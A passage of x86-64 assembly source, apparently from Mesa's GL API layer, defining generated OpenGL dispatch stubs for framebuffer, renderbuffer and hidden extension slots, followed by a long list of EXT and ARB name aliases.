pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6032(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FramebufferTexture3DEXT), .-GL_PREFIX(FramebufferTexture3DEXT)
.p2align 4,,15
.globl GL_PREFIX(GenFramebuffersEXT)
.type GL_PREFIX(GenFramebuffersEXT), @function
/*
 * glGenFramebuffersEXT dispatch stub — jumps through dispatch slot 755
 * (offset 6040); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(GenFramebuffersEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6040(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 6040(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6040(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 6040(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenFramebuffersEXT), .-GL_PREFIX(GenFramebuffersEXT)
.p2align 4,,15
.globl GL_PREFIX(GenRenderbuffersEXT)
.type GL_PREFIX(GenRenderbuffersEXT), @function
/*
 * glGenRenderbuffersEXT dispatch stub — jumps through dispatch slot 756
 * (offset 6048); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(GenRenderbuffersEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6048(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 6048(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6048(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 6048(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenRenderbuffersEXT), .-GL_PREFIX(GenRenderbuffersEXT)
.p2align 4,,15
.globl GL_PREFIX(GenerateMipmapEXT)
.type GL_PREFIX(GenerateMipmapEXT), @function
/*
 * glGenerateMipmapEXT dispatch stub — jumps through dispatch slot 757
 * (offset 6056); saves %rdi around the lookup call.
 */
GL_PREFIX(GenerateMipmapEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6056(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 6056(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6056(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 6056(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenerateMipmapEXT), .-GL_PREFIX(GenerateMipmapEXT)
.p2align 4,,15
.globl GL_PREFIX(GetFramebufferAttachmentParameterivEXT)
.type GL_PREFIX(GetFramebufferAttachmentParameterivEXT), @function
/*
 * glGetFramebufferAttachmentParameterivEXT dispatch stub — jumps through
 * dispatch slot 758 (offset 6064); saves %rdi/%rsi/%rdx/%rcx (+%rbp
 * alignment pad) around the lookup call.
 */
GL_PREFIX(GetFramebufferAttachmentParameterivEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6064(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6064(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6064(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6064(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetFramebufferAttachmentParameterivEXT), .-GL_PREFIX(GetFramebufferAttachmentParameterivEXT)
.p2align 4,,15
.globl GL_PREFIX(GetRenderbufferParameterivEXT)
.type GL_PREFIX(GetRenderbufferParameterivEXT), @function
/*
 * glGetRenderbufferParameterivEXT dispatch stub — jumps through dispatch
 * slot 759 (offset 6072); saves %rdi/%rsi/%rdx around the lookup call.
 */
GL_PREFIX(GetRenderbufferParameterivEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6072(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 6072(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6072(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 6072(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetRenderbufferParameterivEXT), .-GL_PREFIX(GetRenderbufferParameterivEXT)
.p2align 4,,15
.globl GL_PREFIX(IsFramebufferEXT)
.type GL_PREFIX(IsFramebufferEXT), @function
/*
 * glIsFramebufferEXT dispatch stub — jumps through dispatch slot 760
 * (offset 6080); saves %rdi around the lookup call.
 */
GL_PREFIX(IsFramebufferEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6080(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 6080(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6080(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 6080(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsFramebufferEXT), .-GL_PREFIX(IsFramebufferEXT)
.p2align 4,,15
.globl GL_PREFIX(IsRenderbufferEXT)
.type GL_PREFIX(IsRenderbufferEXT), @function
/*
 * glIsRenderbufferEXT dispatch stub — jumps through dispatch slot 761
 * (offset 6088); saves %rdi around the lookup call.
 */
GL_PREFIX(IsRenderbufferEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6088(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 6088(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6088(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 6088(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsRenderbufferEXT), .-GL_PREFIX(IsRenderbufferEXT)
.p2align 4,,15
.globl GL_PREFIX(RenderbufferStorageEXT)
.type GL_PREFIX(RenderbufferStorageEXT), @function
/*
 * glRenderbufferStorageEXT dispatch stub — jumps through dispatch
 * slot 762 (offset 6096); saves %rdi/%rsi/%rdx/%rcx (+%rbp alignment
 * pad) around the lookup call.
 */
GL_PREFIX(RenderbufferStorageEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6096(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6096(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6096(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6096(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RenderbufferStorageEXT), .-GL_PREFIX(RenderbufferStorageEXT)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_763)
.type GL_PREFIX(_dispatch_stub_763), @function
HIDDEN(GL_PREFIX(_dispatch_stub_763))
/*
 * Hidden dispatch stub #763 — jumps through dispatch slot 763
 * (offset 6104); saves all six integer arg registers (+%rbp alignment
 * pad) around the lookup call.
 */
GL_PREFIX(_dispatch_stub_763):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6104(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6104(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6104(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6104(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_763), .-GL_PREFIX(_dispatch_stub_763)
.p2align 4,,15
.globl GL_PREFIX(FramebufferTextureLayerEXT)
.type GL_PREFIX(FramebufferTextureLayerEXT), @function
/*
 * glFramebufferTextureLayerEXT dispatch stub — jumps through dispatch
 * slot 764 (offset 6112); saves %rdi/%rsi/%rdx/%rcx/%r8 around the
 * lookup call.
 */
GL_PREFIX(FramebufferTextureLayerEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6112(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6112(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6112(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6112(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FramebufferTextureLayerEXT), .-GL_PREFIX(FramebufferTextureLayerEXT)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_765)
.type GL_PREFIX(_dispatch_stub_765), @function
HIDDEN(GL_PREFIX(_dispatch_stub_765))
/*
 * Hidden dispatch stub #765 — jumps through dispatch slot 765
 * (offset 6120); saves %rdi/%rsi/%rdx/%rcx (+%rbp alignment pad)
 * around the lookup call.
 */
GL_PREFIX(_dispatch_stub_765):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6120(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6120(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6120(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6120(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_765), .-GL_PREFIX(_dispatch_stub_765)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_766)
.type GL_PREFIX(_dispatch_stub_766), @function
HIDDEN(GL_PREFIX(_dispatch_stub_766))
/*
 * Hidden dispatch stub #766 — jumps through dispatch slot 766
 * (offset 6128); saves %rdi/%rsi/%rdx/%rcx (+%rbp alignment pad)
 * around the lookup call.
 */
GL_PREFIX(_dispatch_stub_766):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6128(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6128(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6128(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6128(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_766), .-GL_PREFIX(_dispatch_stub_766)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_767)
.type GL_PREFIX(_dispatch_stub_767), @function
HIDDEN(GL_PREFIX(_dispatch_stub_767))
/*
 * Hidden dispatch stub #767 — jumps through dispatch slot 767
 * (offset 6136); saves %rdi/%rsi/%rdx/%rcx (+%rbp alignment pad)
 * around the lookup call.
 */
GL_PREFIX(_dispatch_stub_767):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6136(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6136(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6136(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6136(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_767), .-GL_PREFIX(_dispatch_stub_767)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_768)
.type GL_PREFIX(_dispatch_stub_768), @function
HIDDEN(GL_PREFIX(_dispatch_stub_768))
/*
 * Hidden dispatch stub #768 — jumps through dispatch slot 768
 * (offset 6144); saves %rdi/%rsi/%rdx around the lookup call.
 */
GL_PREFIX(_dispatch_stub_768):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6144(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 6144(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6144(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 6144(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_768), .-GL_PREFIX(_dispatch_stub_768)
/* _dispatch_stub_769 -- dynamic GL entry point, dispatch-table slot 769
 * (byte offset 769*8 = 6152).  Same pattern as the other stubs: fetch
 * the dispatch table, load the slot into %r11, tail-jump. */
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_769)
.type GL_PREFIX(_dispatch_stub_769), @function
HIDDEN(GL_PREFIX(_dispatch_stub_769))
GL_PREFIX(_dispatch_stub_769):
#if defined(GLX_USE_TLS)
	/* TLS build: relies on _x86_64_get_dispatch preserving arg regs. */
call _x86_64_get_dispatch@PLT
movq 6152(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
	/* pthreads build: save the three live argument registers around
	 * the C call; three pushes keep %rsp 16-byte aligned at the call. */
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 6152(%rax), %r11
jmp *%r11
#else
	/* Single-threaded build: cached global pointer, lazily initialized. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6152(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 6152(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_769), .-GL_PREFIX(_dispatch_stub_769)
.globl GL_PREFIX(ArrayElementEXT) ; .set GL_PREFIX(ArrayElementEXT), GL_PREFIX(ArrayElement)
.globl GL_PREFIX(BindTextureEXT) ; .set GL_PREFIX(BindTextureEXT), GL_PREFIX(BindTexture)
.globl GL_PREFIX(DrawArraysEXT) ; .set GL_PREFIX(DrawArraysEXT), GL_PREFIX(DrawArrays)
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(AreTexturesResidentEXT) ; .set GL_PREFIX(AreTexturesResidentEXT), GL_PREFIX(AreTexturesResident)
#endif
.globl GL_PREFIX(CopyTexImage1DEXT) ; .set GL_PREFIX(CopyTexImage1DEXT), GL_PREFIX(CopyTexImage1D)
.globl GL_PREFIX(CopyTexImage2DEXT) ; .set GL_PREFIX(CopyTexImage2DEXT), GL_PREFIX(CopyTexImage2D)
.globl GL_PREFIX(CopyTexSubImage1DEXT) ; .set GL_PREFIX(CopyTexSubImage1DEXT), GL_PREFIX(CopyTexSubImage1D)
.globl GL_PREFIX(CopyTexSubImage2DEXT) ; .set GL_PREFIX(CopyTexSubImage2DEXT), GL_PREFIX(CopyTexSubImage2D)
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(DeleteTexturesEXT) ; .set GL_PREFIX(DeleteTexturesEXT), GL_PREFIX(DeleteTextures)
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(GenTexturesEXT) ; .set GL_PREFIX(GenTexturesEXT), GL_PREFIX(GenTextures)
#endif
.globl GL_PREFIX(GetPointervEXT) ; .set GL_PREFIX(GetPointervEXT), GL_PREFIX(GetPointerv)
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(IsTextureEXT) ; .set GL_PREFIX(IsTextureEXT), GL_PREFIX(IsTexture)
#endif
.globl GL_PREFIX(PrioritizeTexturesEXT) ; .set GL_PREFIX(PrioritizeTexturesEXT), GL_PREFIX(PrioritizeTextures)
.globl GL_PREFIX(TexSubImage1DEXT) ; .set GL_PREFIX(TexSubImage1DEXT), GL_PREFIX(TexSubImage1D)
.globl GL_PREFIX(TexSubImage2DEXT) ; .set GL_PREFIX(TexSubImage2DEXT), GL_PREFIX(TexSubImage2D)
.globl GL_PREFIX(BlendColorEXT) ; .set GL_PREFIX(BlendColorEXT), GL_PREFIX(BlendColor)
.globl GL_PREFIX(BlendEquationEXT) ; .set GL_PREFIX(BlendEquationEXT), GL_PREFIX(BlendEquation)
.globl GL_PREFIX(DrawRangeElementsEXT) ; .set GL_PREFIX(DrawRangeElementsEXT), GL_PREFIX(DrawRangeElements)
.globl GL_PREFIX(ColorTableEXT) ; .set GL_PREFIX(ColorTableEXT), GL_PREFIX(ColorTable)
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(GetColorTableEXT) ; .set GL_PREFIX(GetColorTableEXT), GL_PREFIX(GetColorTable)
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(GetColorTableParameterfvEXT) ; .set GL_PREFIX(GetColorTableParameterfvEXT), GL_PREFIX(GetColorTableParameterfv)
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(GetColorTableParameterivEXT) ; .set GL_PREFIX(GetColorTableParameterivEXT), GL_PREFIX(GetColorTableParameteriv)
#endif
.globl GL_PREFIX(TexImage3DEXT) ; .set GL_PREFIX(TexImage3DEXT), GL_PREFIX(TexImage3D)
.globl GL_PREFIX(TexSubImage3DEXT) ; .set GL_PREFIX(TexSubImage3DEXT), GL_PREFIX(TexSubImage3D)
.globl GL_PREFIX(CopyTexSubImage3DEXT) ; .set GL_PREFIX(CopyTexSubImage3DEXT), GL_PREFIX(CopyTexSubImage3D)
.globl GL_PREFIX(ActiveTexture) ; .set GL_PREFIX(ActiveTexture), GL_PREFIX(ActiveTextureARB)
.globl GL_PREFIX(ClientActiveTexture) ; .set GL_PREFIX(ClientActiveTexture), GL_PREFIX(ClientActiveTextureARB)
.globl GL_PREFIX(MultiTexCoord1d) ; .set GL_PREFIX(MultiTexCoord1d), GL_PREFIX(MultiTexCoord1dARB)
.globl GL_PREFIX(MultiTexCoord1dv) ; .set GL_PREFIX(MultiTexCoord1dv), GL_PREFIX(MultiTexCoord1dvARB)
.globl GL_PREFIX(MultiTexCoord1f) ; .set GL_PREFIX(MultiTexCoord1f), GL_PREFIX(MultiTexCoord1fARB)
.globl GL_PREFIX(MultiTexCoord1fv) ; .set GL_PREFIX(MultiTexCoord1fv), GL_PREFIX(MultiTexCoord1fvARB)
.globl GL_PREFIX(MultiTexCoord1i) ; .set GL_PREFIX(MultiTexCoord1i), GL_PREFIX(MultiTexCoord1iARB)
.globl GL_PREFIX(MultiTexCoord1iv) ; .set GL_PREFIX(MultiTexCoord1iv), GL_PREFIX(MultiTexCoord1ivARB)
.globl GL_PREFIX(MultiTexCoord1s) ; .set GL_PREFIX(MultiTexCoord1s), GL_PREFIX(MultiTexCoord1sARB)
.globl GL_PREFIX(MultiTexCoord1sv) ; .set GL_PREFIX(MultiTexCoord1sv), GL_PREFIX(MultiTexCoord1svARB)
.globl GL_PREFIX(MultiTexCoord2d) ; .set GL_PREFIX(MultiTexCoord2d), GL_PREFIX(MultiTexCoord2dARB)
.globl GL_PREFIX(MultiTexCoord2dv) ; .set GL_PREFIX(MultiTexCoord2dv), GL_PREFIX(MultiTexCoord2dvARB)
.globl GL_PREFIX(MultiTexCoord2f) ; .set GL_PREFIX(MultiTexCoord2f), GL_PREFIX(MultiTexCoord2fARB)
.globl GL_PREFIX(MultiTexCoord2fv) ; .set GL_PREFIX(MultiTexCoord2fv), GL_PREFIX(MultiTexCoord2fvARB)
.globl GL_PREFIX(MultiTexCoord2i) ; .set GL_PREFIX(MultiTexCoord2i), GL_PREFIX(MultiTexCoord2iARB)
.globl GL_PREFIX(MultiTexCoord2iv) ; .set GL_PREFIX(MultiTexCoord2iv), GL_PREFIX(MultiTexCoord2ivARB)
.globl GL_PREFIX(MultiTexCoord2s) ; .set GL_PREFIX(MultiTexCoord2s), GL_PREFIX(MultiTexCoord2sARB)
.globl GL_PREFIX(MultiTexCoord2sv) ; .set GL_PREFIX(MultiTexCoord2sv), GL_PREFIX(MultiTexCoord2svARB)
.globl GL_PREFIX(MultiTexCoord3d) ; .set GL_PREFIX(MultiTexCoord3d), GL_PREFIX(MultiTexCoord3dARB)
.globl GL_PREFIX(MultiTexCoord3dv) ; .set GL_PREFIX(MultiTexCoord3dv), GL_PREFIX(MultiTexCoord3dvARB)
.globl GL_PREFIX(MultiTexCoord3f) ; .set GL_PREFIX(MultiTexCoord3f), GL_PREFIX(MultiTexCoord3fARB)
.globl GL_PREFIX(MultiTexCoord3fv) ; .set GL_PREFIX(MultiTexCoord3fv), GL_PREFIX(MultiTexCoord3fvARB)
.globl GL_PREFIX(MultiTexCoord3i) ; .set GL_PREFIX(MultiTexCoord3i), GL_PREFIX(MultiTexCoord3iARB)
.globl GL_PREFIX(MultiTexCoord3iv) ; .set GL_PREFIX(MultiTexCoord3iv), GL_PREFIX(MultiTexCoord3ivARB)
.globl GL_PREFIX(MultiTexCoord3s) ; .set GL_PREFIX(MultiTexCoord3s), GL_PREFIX(MultiTexCoord3sARB)
.globl GL_PREFIX(MultiTexCoord3sv) ; .set GL_PREFIX(MultiTexCoord3sv), GL_PREFIX(MultiTexCoord3svARB)
.globl GL_PREFIX(MultiTexCoord4d) ; .set GL_PREFIX(MultiTexCoord4d), GL_PREFIX(MultiTexCoord4dARB)
.globl GL_PREFIX(MultiTexCoord4dv) ; .set GL_PREFIX(MultiTexCoord4dv), GL_PREFIX(MultiTexCoord4dvARB)
.globl GL_PREFIX(MultiTexCoord4f) ; .set GL_PREFIX(MultiTexCoord4f), GL_PREFIX(MultiTexCoord4fARB)
.globl GL_PREFIX(MultiTexCoord4fv) ; .set GL_PREFIX(MultiTexCoord4fv), GL_PREFIX(MultiTexCoord4fvARB)
.globl GL_PREFIX(MultiTexCoord4i) ; .set GL_PREFIX(MultiTexCoord4i), GL_PREFIX(MultiTexCoord4iARB)
.globl GL_PREFIX(MultiTexCoord4iv) ; .set GL_PREFIX(MultiTexCoord4iv), GL_PREFIX(MultiTexCoord4ivARB)
.globl GL_PREFIX(MultiTexCoord4s) ; .set GL_PREFIX(MultiTexCoord4s), GL_PREFIX(MultiTexCoord4sARB)
.globl GL_PREFIX(MultiTexCoord4sv) ; .set GL_PREFIX(MultiTexCoord4sv), GL_PREFIX(MultiTexCoord4svARB)
.globl GL_PREFIX(LoadTransposeMatrixd) ; .set GL_PREFIX(LoadTransposeMatrixd), GL_PREFIX(LoadTransposeMatrixdARB)
.globl GL_PREFIX(LoadTransposeMatrixf) ; .set GL_PREFIX(LoadTransposeMatrixf), GL_PREFIX(LoadTransposeMatrixfARB)
.globl GL_PREFIX(MultTransposeMatrixd) ; .set GL_PREFIX(MultTransposeMatrixd), GL_PREFIX(MultTransposeMatrixdARB)
.globl GL_PREFIX(MultTransposeMatrixf) ; .set GL_PREFIX(MultTransposeMatrixf), GL_PREFIX(MultTransposeMatrixfARB)
.globl GL_PREFIX(SampleCoverage) ; .set GL_PREFIX(SampleCoverage), GL_PREFIX(SampleCoverageARB)
.globl GL_PREFIX(CompressedTexImage1D) ; .set GL_PREFIX(CompressedTexImage1D), GL_PREFIX(CompressedTexImage1DARB)
.globl GL_PREFIX(CompressedTexImage2D) ; .set GL_PREFIX(CompressedTexImage2D), GL_PREFIX(CompressedTexImage2DARB)
.globl GL_PREFIX(CompressedTexImage3D) ; .set GL_PREFIX(CompressedTexImage3D), GL_PREFIX(CompressedTexImage3DARB)
.globl GL_PREFIX(CompressedTexSubImage1D) ; .set GL_PREFIX(CompressedTexSubImage1D), GL_PREFIX(CompressedTexSubImage1DARB)
.globl GL_PREFIX(CompressedTexSubImage2D) ; .set GL_PREFIX(CompressedTexSubImage2D), GL_PREFIX(CompressedTexSubImage2DARB)
.globl GL_PREFIX(CompressedTexSubImage3D) ; .set GL_PREFIX(CompressedTexSubImage3D), GL_PREFIX(CompressedTexSubImage3DARB)
.globl GL_PREFIX(GetCompressedTexImage) ; .set GL_PREFIX(GetCompressedTexImage), GL_PREFIX(GetCompressedTexImageARB)
.globl GL_PREFIX(DisableVertexAttribArray) ; .set GL_PREFIX(DisableVertexAttribArray), GL_PREFIX(DisableVertexAttribArrayARB)
.globl GL_PREFIX(EnableVertexAttribArray) ; .set GL_PREFIX(EnableVertexAttribArray), GL_PREFIX(EnableVertexAttribArrayARB)
.globl GL_PREFIX(GetVertexAttribdv) ; .set GL_PREFIX(GetVertexAttribdv), GL_PREFIX(GetVertexAttribdvARB)
.globl GL_PREFIX(GetVertexAttribfv) ; .set GL_PREFIX(GetVertexAttribfv), GL_PREFIX(GetVertexAttribfvARB)
.globl GL_PREFIX(GetVertexAttribiv) ; .set GL_PREFIX(GetVertexAttribiv), GL_PREFIX(GetVertexAttribivARB)
.globl GL_PREFIX(ProgramParameter4dNV) ; .set GL_PREFIX(ProgramParameter4dNV), GL_PREFIX(ProgramEnvParameter4dARB)
.globl GL_PREFIX(ProgramParameter4dvNV) ; .set GL_PREFIX(ProgramParameter4dvNV), GL_PREFIX(ProgramEnvParameter4dvARB)
.globl GL_PREFIX(ProgramParameter4fNV) ; .set GL_PREFIX(ProgramParameter4fNV), GL_PREFIX(ProgramEnvParameter4fARB)
.globl GL_PREFIX(ProgramParameter4fvNV) ; .set GL_PREFIX(ProgramParameter4fvNV), GL_PREFIX(ProgramEnvParameter4fvARB)
.globl GL_PREFIX(VertexAttrib1d) ; .set GL_PREFIX(VertexAttrib1d), GL_PREFIX(VertexAttrib1dARB)
.globl GL_PREFIX(VertexAttrib1dv) ; .set GL_PREFIX(VertexAttrib1dv), GL_PREFIX(VertexAttrib1dvARB)
.globl GL_PREFIX(VertexAttrib1f) ; .set GL_PREFIX(VertexAttrib1f), GL_PREFIX(VertexAttrib1fARB)
.globl GL_PREFIX(VertexAttrib1fv) ; .set GL_PREFIX(VertexAttrib1fv), GL_PREFIX(VertexAttrib1fvARB)
.globl GL_PREFIX(VertexAttrib1s) ; .set GL_PREFIX(VertexAttrib1s), GL_PREFIX(VertexAttrib1sARB)
